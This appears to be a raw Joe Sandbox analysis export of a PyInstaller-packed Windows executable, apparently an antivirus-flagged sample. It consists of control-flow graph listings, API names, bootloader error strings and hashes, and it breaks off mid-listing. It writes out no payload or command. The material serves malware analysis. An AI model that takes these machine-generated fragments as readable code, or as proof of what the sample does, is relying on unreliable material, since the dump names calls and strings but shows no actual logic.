78177->78169 78178 7ffd93d12fb8 78179 7ffd93eac6b0 78178->78179 78180 7ffd93eac784 00007FFDB222F020 78179->78180 78181 7ffd93eac6d9 78179->78181 78182 7ff7b2b62fe0 78183 7ff7b2b62ff0 78182->78183 78184 7ff7b2b6302b 78183->78184 78185 7ff7b2b63041 78183->78185 78210 7ff7b2b62710 54 API calls _log10_special 78184->78210 78187 7ff7b2b63061 78185->78187 78198 
7ff7b2b63077 __std_exception_destroy 78185->78198 78211 7ff7b2b62710 54 API calls _log10_special 78187->78211 78188 7ff7b2b6c550 _log10_special 8 API calls 78191 7ff7b2b631fa 78188->78191 78190 7ff7b2b63037 __std_exception_destroy 78190->78188 78192 7ff7b2b61470 116 API calls 78192->78198 78193 7ff7b2b63349 78218 7ff7b2b62710 54 API calls _log10_special 78193->78218 78194 7ff7b2b61c80 49 API calls 78194->78198 78196 7ff7b2b63333 78217 7ff7b2b62710 54 API calls _log10_special 78196->78217 78198->78190 78198->78192 78198->78193 78198->78194 78198->78196 78199 7ff7b2b6330d 78198->78199 78201 7ff7b2b63207 78198->78201 78216 7ff7b2b62710 54 API calls _log10_special 78199->78216 78202 7ff7b2b63273 78201->78202 78212 7ff7b2b7a404 37 API calls 2 library calls 78201->78212 78204 7ff7b2b6329e 78202->78204 78205 7ff7b2b63290 78202->78205 78214 7ff7b2b62dd0 37 API calls 78204->78214 78213 7ff7b2b7a404 37 API calls 2 library calls 78205->78213 78208 7ff7b2b6329c 78215 7ff7b2b62500 54 API calls __std_exception_destroy 78208->78215 78210->78190 78211->78190 78212->78202 78213->78208 78214->78208 78215->78190 78216->78190 78217->78190 78218->78190 78219 7ff7b2b79961 78231 7ff7b2b7a3d8 78219->78231 78221 7ff7b2b79966 78222 7ff7b2b7998d GetModuleHandleW 78221->78222 78223 7ff7b2b799d7 78221->78223 78222->78223 78224 7ff7b2b7999a 78222->78224 78225 7ff7b2b79864 11 API calls 78223->78225 78224->78223 78230 7ff7b2b79a88 GetModuleHandleExW GetProcAddress FreeLibrary 78224->78230 78226 7ff7b2b79a13 78225->78226 78227 7ff7b2b79a1a 78226->78227 78228 7ff7b2b79a30 11 API calls 78226->78228 78229 7ff7b2b79a2c 78228->78229 78230->78223 78236 7ff7b2b7b150 45 API calls 3 library calls 78231->78236 78233 7ff7b2b7a3e1 78237 7ff7b2b7a504 45 API calls 2 library calls 78233->78237 78236->78233 78238 7ffd93d16b7c 78239 7ffd93e7a740 78238->78239 78242 7ffd93d12dec GetLastError SetLastError 78239->78242 78241 7ffd93e7a75d 78242->78241

Control-flow Graph

[Control-flow graph residue: basic-block edge listing from the interactive graph viewer (executed / not executed colouring lost), not reproducible as text. Recoverable information: control_flow_graph 0 covers the function at 7ff7b2b61000-7ff7b2b63806; blocks in that function call SetDllDirectoryW, LoadLibraryExW, PostMessageW and GetMessageW, and internal routines including 7ff7b2b61950, 7ff7b2b61c80, 7ff7b2b62710, 7ff7b2b645c0, 7ff7b2b67f90, 7ff7b2b68830, 7ff7b2b68940, 7ff7b2b689a0, 7ff7b2b69390, 7ff7b2b690c0, 7ff7b2b690e0, 7ff7b2b75250 and 7ff7b2b74f30.]
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: 22fa9124200c8f056fed24b16db7ecbee18f75092d4bb1744dca779f6c6fa9b9
• Instruction ID: 5369ba84b5ec896d6659514cd31c37792b2bf0098ce807c961b8f287616f1c2d
• Opcode Fuzzy Hash: 22fa9124200c8f056fed24b16db7ecbee18f75092d4bb1744dca779f6c6fa9b9
• Instruction Fuzzy Hash: 8132B222A0A68250FB1BB72C94543BBE651AF67B40FC44036DB5D862DEFFACE454C325

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                    control_flow_graph 467 7ff7b2b86964-7ff7b2b869d7 call 7ff7b2b86698 470 7ff7b2b869d9-7ff7b2b869e2 call 7ff7b2b74ee8 467->470 471 7ff7b2b869f1-7ff7b2b869fb call 7ff7b2b78520 467->471 476 7ff7b2b869e5-7ff7b2b869ec call 7ff7b2b74f08 470->476 477 7ff7b2b869fd-7ff7b2b86a14 call 7ff7b2b74ee8 call 7ff7b2b74f08 471->477 478 7ff7b2b86a16-7ff7b2b86a7f CreateFileW 471->478 491 7ff7b2b86d32-7ff7b2b86d52 476->491 477->476 481 7ff7b2b86afc-7ff7b2b86b07 GetFileType 478->481 482 7ff7b2b86a81-7ff7b2b86a87 478->482 486 7ff7b2b86b5a-7ff7b2b86b61 481->486 487 7ff7b2b86b09-7ff7b2b86b44 GetLastError call 7ff7b2b74e7c CloseHandle 481->487 483 7ff7b2b86ac9-7ff7b2b86af7 GetLastError call 7ff7b2b74e7c 482->483 484 7ff7b2b86a89-7ff7b2b86a8d 482->484 483->476 484->483 489 7ff7b2b86a8f-7ff7b2b86ac7 CreateFileW 484->489 494 7ff7b2b86b69-7ff7b2b86b6c 486->494 495 7ff7b2b86b63-7ff7b2b86b67 486->495 487->476 502 7ff7b2b86b4a-7ff7b2b86b55 call 7ff7b2b74f08 487->502 489->481 489->483 499 7ff7b2b86b72-7ff7b2b86bc7 call 7ff7b2b78438 494->499 500 7ff7b2b86b6e 494->500 495->499 505 7ff7b2b86bc9-7ff7b2b86bd5 call 7ff7b2b868a0 499->505 506 7ff7b2b86be6-7ff7b2b86c17 call 7ff7b2b86418 499->506 500->499 502->476 505->506 512 7ff7b2b86bd7 505->512 513 7ff7b2b86c1d-7ff7b2b86c5f 506->513 514 7ff7b2b86c19-7ff7b2b86c1b 506->514 515 7ff7b2b86bd9-7ff7b2b86be1 call 7ff7b2b7aac0 512->515 516 7ff7b2b86c81-7ff7b2b86c8c 513->516 517 7ff7b2b86c61-7ff7b2b86c65 513->517 514->515 515->491 519 7ff7b2b86c92-7ff7b2b86c96 516->519 520 7ff7b2b86d30 516->520 517->516 518 7ff7b2b86c67-7ff7b2b86c7c 517->518 518->516 519->520 522 7ff7b2b86c9c-7ff7b2b86ce1 CloseHandle CreateFileW 519->522 520->491 524 7ff7b2b86d16-7ff7b2b86d2b 522->524 525 7ff7b2b86ce3-7ff7b2b86d11 GetLastError call 7ff7b2b74e7c call 
7ff7b2b78660 522->525 524->520 525->524
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: 264b094f57909c2bb1460f428ca1dd434130a52c72b27f80e3a9f5a970c7b9ed
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 09C1F232B25A4185EB15EF68C0852AE7771F75AB98B410239DB2E9B7E8EF78D051C310
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
• Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: s"5
• API String ID: 3300690313-1492618520
• Opcode ID: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
• Instruction ID: 916426b45afbcbac812e8cbe985fd03a717814b28dcc321026a3bab69e555330
• Opcode Fuzzy Hash: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
• Instruction Fuzzy Hash: D262672272819286E3398F78E59127D7790F74A395F049632EA9FC37C5EA3CEA44D704
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: d2110104ec7205ee03b1d9cac80374c48a8c3c1b80b4462dcf66a95718dd1f68
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: C9F02D22A1974182F7619B68B489377F350BB55324F840335DBAD456D8EF7CD048C704

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                    control_flow_graph 269 7ff7b2b61950-7ff7b2b6198b call 7ff7b2b645c0 272 7ff7b2b61c4e-7ff7b2b61c72 call 7ff7b2b6c550 269->272 273 7ff7b2b61991-7ff7b2b619d1 call 7ff7b2b67f90 269->273 278 7ff7b2b61c3b-7ff7b2b61c3e call 7ff7b2b7004c 273->278 279 7ff7b2b619d7-7ff7b2b619e7 call 7ff7b2b706d4 273->279 283 7ff7b2b61c43-7ff7b2b61c4b 278->283 284 7ff7b2b61a08-7ff7b2b61a24 call 7ff7b2b7039c 279->284 285 7ff7b2b619e9-7ff7b2b61a03 call 7ff7b2b74f08 call 7ff7b2b62910 279->285 283->272 291 7ff7b2b61a26-7ff7b2b61a40 call 7ff7b2b74f08 call 7ff7b2b62910 284->291 292 7ff7b2b61a45-7ff7b2b61a5a call 7ff7b2b74f28 284->292 285->278 291->278 299 7ff7b2b61a5c-7ff7b2b61a76 call 7ff7b2b74f08 call 7ff7b2b62910 292->299 300 7ff7b2b61a7b-7ff7b2b61afc call 7ff7b2b61c80 * 2 call 7ff7b2b706d4 292->300 299->278 311 7ff7b2b61b01-7ff7b2b61b14 call 7ff7b2b74f44 300->311 314 7ff7b2b61b16-7ff7b2b61b30 call 7ff7b2b74f08 call 7ff7b2b62910 311->314 315 7ff7b2b61b35-7ff7b2b61b4e call 7ff7b2b7039c 311->315 314->278 320 7ff7b2b61b50-7ff7b2b61b6a call 7ff7b2b74f08 call 7ff7b2b62910 315->320 321 7ff7b2b61b6f-7ff7b2b61b8b call 7ff7b2b70110 315->321 320->278 329 7ff7b2b61b9e-7ff7b2b61bac 321->329 330 7ff7b2b61b8d-7ff7b2b61b99 call 7ff7b2b62710 321->330 329->278 333 7ff7b2b61bb2-7ff7b2b61bb9 329->333 330->278 334 7ff7b2b61bc1-7ff7b2b61bc7 333->334 336 7ff7b2b61bc9-7ff7b2b61bd6 334->336 337 7ff7b2b61be0-7ff7b2b61bef 334->337 338 7ff7b2b61bf1-7ff7b2b61bfa 336->338 337->337 337->338 339 7ff7b2b61bfc-7ff7b2b61bff 338->339 340 7ff7b2b61c0f 338->340 339->340 341 7ff7b2b61c01-7ff7b2b61c04 339->341 342 7ff7b2b61c11-7ff7b2b61c24 340->342 341->340 343 7ff7b2b61c06-7ff7b2b61c09 341->343 344 7ff7b2b61c2d-7ff7b2b61c39 342->344 345 7ff7b2b61c26 342->345 343->340 346 7ff7b2b61c0b-7ff7b2b61c0d 343->346 
344->278 344->334 345->344 346->342
APIs
• Part of subcall function 00007FF7B2B67F90: _fread_nolock.LIBCMT ref: 00007FF7B2B6803A
• _fread_nolock.LIBCMT ref: 00007FF7B2B61A1B
• Part of subcall function 00007FF7B2B62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
• Instruction ID: 3ebe62b530dbe395818ae56b507cd4531cc80e8cb1b47b6e0aadcfa77e58790f
• Opcode Fuzzy Hash: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
• Instruction Fuzzy Hash: 8481C131A1A68285EB13AB2C90442AAF3A1EB66740F844435DB4D8B79DFEBCE045C724

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 8f5680adc7c7fda8f27f7e66f126237117e35862a43ae9ad61e430f2822435f3
• Instruction ID: 545ad54409c11d86934cdfeac539d5fe36c7bb2226d6b1f0a2750ebc3f9fd2a9
• Opcode Fuzzy Hash: 8f5680adc7c7fda8f27f7e66f126237117e35862a43ae9ad61e430f2822435f3
• Instruction Fuzzy Hash: F2416121A1A54285EA13FB2994005BBF390AF66794FC44436EF4D87B9EEEBCE501C724

Control-flow Graph

control_flow_graph 530 7ff7b2b61210-7ff7b2b6126d call 7ff7b2b6bd80 533 7ff7b2b61297-7ff7b2b612af call 7ff7b2b74f44 530->533 534 7ff7b2b6126f-7ff7b2b61296 call 7ff7b2b62710 530->534 539 7ff7b2b612d4-7ff7b2b612e4 call 7ff7b2b74f44 533->539 540 7ff7b2b612b1-7ff7b2b612cf call 7ff7b2b74f08 call 7ff7b2b62910 533->540 546 7ff7b2b61309-7ff7b2b6131b 539->546 547 7ff7b2b612e6-7ff7b2b61304 call 7ff7b2b74f08 call 7ff7b2b62910 539->547 552 7ff7b2b61439-7ff7b2b6146d call 7ff7b2b6ba60 call 7ff7b2b74f30 * 2 540->552 548 7ff7b2b61320-7ff7b2b61345 call 7ff7b2b7039c 546->548 547->552 558 7ff7b2b6134b-7ff7b2b61355 call 7ff7b2b70110 548->558 559 7ff7b2b61431 548->559 558->559 566 7ff7b2b6135b-7ff7b2b61367 558->566 559->552 568 7ff7b2b61370-7ff7b2b61398 call 7ff7b2b6a1c0 566->568 571 7ff7b2b6139a-7ff7b2b6139d 568->571 572 7ff7b2b61416-7ff7b2b6142c call 7ff7b2b62710 568->572 573 7ff7b2b6139f-7ff7b2b613a9 571->573 574 7ff7b2b61411 571->574 572->559 576 7ff7b2b613ab-7ff7b2b613b9 call 7ff7b2b70adc 573->576 577 7ff7b2b613d4-7ff7b2b613d7 573->577 574->572 583 7ff7b2b613be-7ff7b2b613c1 576->583 578 7ff7b2b613ea-7ff7b2b613ef 577->578 579 7ff7b2b613d9-7ff7b2b613e7 call 7ff7b2b89e30 577->579 578->568 582 7ff7b2b613f5-7ff7b2b613f8 578->582 579->578 585 7ff7b2b6140c-7ff7b2b6140f 582->585 586 7ff7b2b613fa-7ff7b2b613fd 582->586 587 7ff7b2b613c3-7ff7b2b613cd call 7ff7b2b70110 583->587 588 7ff7b2b613cf-7ff7b2b613d2 583->588 585->559 586->572 590 7ff7b2b613ff-7ff7b2b61407 586->590 587->578 587->588 588->572 590->548
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: dd836ad82b15e2009d0bed87c4dd8fae95f83ed66c265d52f03f9f67774168e5
• Instruction ID: 53144fe4709357f67e346b8ad92ddd747339be192bd9fb102a0e99d6239dbdf4
• Opcode Fuzzy Hash: dd836ad82b15e2009d0bed87c4dd8fae95f83ed66c265d52f03f9f67774168e5
• Instruction Fuzzy Hash: 8E51C522A1A64241EA23BB1994403BBF290AF66794FC84135EF4D87BDDFEBCD441C714

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636E1
• GetLastError.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636EB
• Part of subcall function 00007FF7B2B62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
• Part of subcall function 00007FF7B2B62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
• Part of subcall function 00007FF7B2B62C50: MessageBoxW.USER32 ref: 00007FF7B2B62D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: 641b8400098f2f3acf4fcd732b4effddf6d016ed010af632c210c6f7a9a5f212
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 5621B461B1A64240FA23BB28E8053B7E250BF66744FC44236D75DC65DDFEACE505C328

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 691 7ff7b2b7ba5c-7ff7b2b7ba82 692 7ff7b2b7ba9d-7ff7b2b7baa1 691->692 693 7ff7b2b7ba84-7ff7b2b7ba98 call 7ff7b2b74ee8 call 7ff7b2b74f08 691->693 694 7ff7b2b7be77-7ff7b2b7be83 call 7ff7b2b74ee8 call 7ff7b2b74f08 692->694 695 7ff7b2b7baa7-7ff7b2b7baae 692->695 707 7ff7b2b7be8e 693->707 714 7ff7b2b7be89 call 7ff7b2b7a8e0 694->714 695->694 697 7ff7b2b7bab4-7ff7b2b7bae2 695->697 697->694 700 7ff7b2b7bae8-7ff7b2b7baef 697->700 703 7ff7b2b7bb08-7ff7b2b7bb0b 700->703 704 7ff7b2b7baf1-7ff7b2b7bb03 call 7ff7b2b74ee8 call 7ff7b2b74f08 700->704 710 7ff7b2b7be73-7ff7b2b7be75 703->710 711 7ff7b2b7bb11-7ff7b2b7bb17 703->711 704->714 712 7ff7b2b7be91-7ff7b2b7bea8 707->712 710->712 711->710 715 7ff7b2b7bb1d-7ff7b2b7bb20 711->715 714->707 715->704 718 7ff7b2b7bb22-7ff7b2b7bb47 715->718 720 7ff7b2b7bb7a-7ff7b2b7bb81 718->720 721 7ff7b2b7bb49-7ff7b2b7bb4b 718->721 722 7ff7b2b7bb56-7ff7b2b7bb6d call 7ff7b2b74ee8 call 7ff7b2b74f08 call 7ff7b2b7a8e0 720->722 723 7ff7b2b7bb83-7ff7b2b7bb8f call 7ff7b2b7d5fc 720->723 724 7ff7b2b7bb4d-7ff7b2b7bb54 721->724 725 7ff7b2b7bb72-7ff7b2b7bb78 721->725 753 7ff7b2b7bd00 722->753 732 7ff7b2b7bb94-7ff7b2b7bbab call 7ff7b2b7a948 * 2 723->732 724->722 724->725 727 7ff7b2b7bbf8-7ff7b2b7bc0f 725->727 730 7ff7b2b7bc8a-7ff7b2b7bc94 call 7ff7b2b8391c 727->730 731 7ff7b2b7bc11-7ff7b2b7bc19 727->731 742 7ff7b2b7bd1e 730->742 743 7ff7b2b7bc9a-7ff7b2b7bcaf 730->743 731->730 735 7ff7b2b7bc1b-7ff7b2b7bc1d 731->735 756 7ff7b2b7bbad-7ff7b2b7bbc3 call 7ff7b2b74f08 call 7ff7b2b74ee8 732->756 757 7ff7b2b7bbc8-7ff7b2b7bbf3 call 7ff7b2b7c284 732->757 735->730 739 7ff7b2b7bc1f-7ff7b2b7bc35 735->739 739->730 744 7ff7b2b7bc37-7ff7b2b7bc43 739->744 746 7ff7b2b7bd23-7ff7b2b7bd43 ReadFile 742->746 743->742 748 7ff7b2b7bcb1-7ff7b2b7bcc3 
GetConsoleMode 743->748 744->730 749 7ff7b2b7bc45-7ff7b2b7bc47 744->749 751 7ff7b2b7be3d-7ff7b2b7be46 GetLastError 746->751 752 7ff7b2b7bd49-7ff7b2b7bd51 746->752 748->742 754 7ff7b2b7bcc5-7ff7b2b7bccd 748->754 749->730 755 7ff7b2b7bc49-7ff7b2b7bc61 749->755 762 7ff7b2b7be48-7ff7b2b7be5e call 7ff7b2b74f08 call 7ff7b2b74ee8 751->762 763 7ff7b2b7be63-7ff7b2b7be66 751->763 752->751 759 7ff7b2b7bd57 752->759 764 7ff7b2b7bd03-7ff7b2b7bd0d call 7ff7b2b7a948 753->764 754->746 761 7ff7b2b7bccf-7ff7b2b7bcf1 ReadConsoleW 754->761 755->730 765 7ff7b2b7bc63-7ff7b2b7bc6f 755->765 756->753 757->727 769 7ff7b2b7bd5e-7ff7b2b7bd73 759->769 771 7ff7b2b7bcf3 GetLastError 761->771 772 7ff7b2b7bd12-7ff7b2b7bd1c 761->772 762->753 766 7ff7b2b7be6c-7ff7b2b7be6e 763->766 767 7ff7b2b7bcf9-7ff7b2b7bcfb call 7ff7b2b74e7c 763->767 764->712 765->730 775 7ff7b2b7bc71-7ff7b2b7bc73 765->775 766->764 767->753 769->764 778 7ff7b2b7bd75-7ff7b2b7bd80 769->778 771->767 772->769 775->730 776 7ff7b2b7bc75-7ff7b2b7bc85 775->776 776->730 783 7ff7b2b7bda7-7ff7b2b7bdaf 778->783 784 7ff7b2b7bd82-7ff7b2b7bd9b call 7ff7b2b7b674 778->784 787 7ff7b2b7be2b-7ff7b2b7be38 call 7ff7b2b7b4b4 783->787 788 7ff7b2b7bdb1-7ff7b2b7bdc3 783->788 791 7ff7b2b7bda0-7ff7b2b7bda2 